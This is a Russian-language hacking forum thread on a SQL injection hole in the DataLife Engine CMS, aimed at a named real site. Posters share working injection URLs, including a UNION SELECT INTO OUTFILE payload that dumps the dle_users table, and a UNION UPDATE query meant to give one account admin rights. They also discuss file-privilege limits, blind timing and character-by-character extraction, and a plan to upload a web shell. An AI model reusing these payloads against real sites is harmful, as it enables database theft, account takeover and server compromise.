Движок DataLife Engine уже очень известний и стоит на многих варезный и новостных порталах PHP: http://www.pc-soft.ru/index.php?subaction=userinfo&user=%2527[SQL]
жаль, но бесполезная бня. На странице несколько sql запросов с выборкой на основе переменной $user с разным количеством возвращаемых данных. UNION запрос составить не получилось =(
Ну прям уже бесполезная: http://www.pc-soft.ru/index.php?subaction=userinfo&user=%2527%20UNION+SELECT+*+FROM+%60dle_users%60%20INTO%20OUTFILE%20%2527/vseravno/net/prav/file.txt наверное версия MySQL ниже 4
2 budulay UNION не получилось по причине, что я изложил в своем посте. Писать заново влом =)))) сорри. А насчет INTO OUTFILE... Спорный вопрос. Если в mysql не запрещены функции для работы с файлами, то вполне реальная уязвимость. Беру свои слова обратно. Молодец блин =) ставлю плюс тебе =)
Блин пачему на локалке нормально файл сохраняет а на серваке нет? пишет Access denied for user ... путь к сохранению указываю от самого корня и в папку разрешенную на запись Че за фингя?
1) юзай поиск 2) читай статьи от ЗаКо 3) это потому что file_priv=0, т.е. привилегии mysql на запись\чтение произвольных файлов (с правами юзера под которым запущен mysql). Если они ровны 0(а у тебя на локалхосте видать 1), то ты не можешь производить действия с файлами.
Если у майскуля нет прав на запись/чтение файлов то остаються 2 вещи: бренчмарк) или посимвольный перебор с надеждой что к базе имеет боступ не только локалхост...
блин парни скажите что не так в этом запросе? PHP: SQL-запрос: SELECT * FROM dle_users WHERE name = '' UNION UPDATE dle_users SET email = "[email protected]", PASSWORD = "********************************", name = "DEX", user_id =2, news_num =0, comm_num =0, user_group =1, lastdate = "1149619615", reg_date = "1149619615", banned = "", allow_mail =1, info = "", signature = "", foto = "", fullname = "", land = "", icq = "", favorites =1, pm_all =0, pm_unread =0 WHERE user_id =2-- LIMIT 0, 30 Через юнион пытаюсь повысить права для своего акаунта и вообще будет ли работать select с union update?
гы классно меня уже чайником обозвали =))) сколько статей ни читал про sql inj нигде не написано что unioun может работать только с select ... вообщем не важно... так кто-нибудь чего-нибудь придумал с этим запросом? А то я уже знаю как определить полный путь к корневой папке и зак залить шелл тоже придумал осталось вот только каким-то образом доступ в админку получить =)))
Молодцы rst, сколько приходилось работать с даталайф не чего тупого я не видел, по идее весь код можно было уместить в 2 раза меньше. В последсвии пришлось самому писать новостной движок!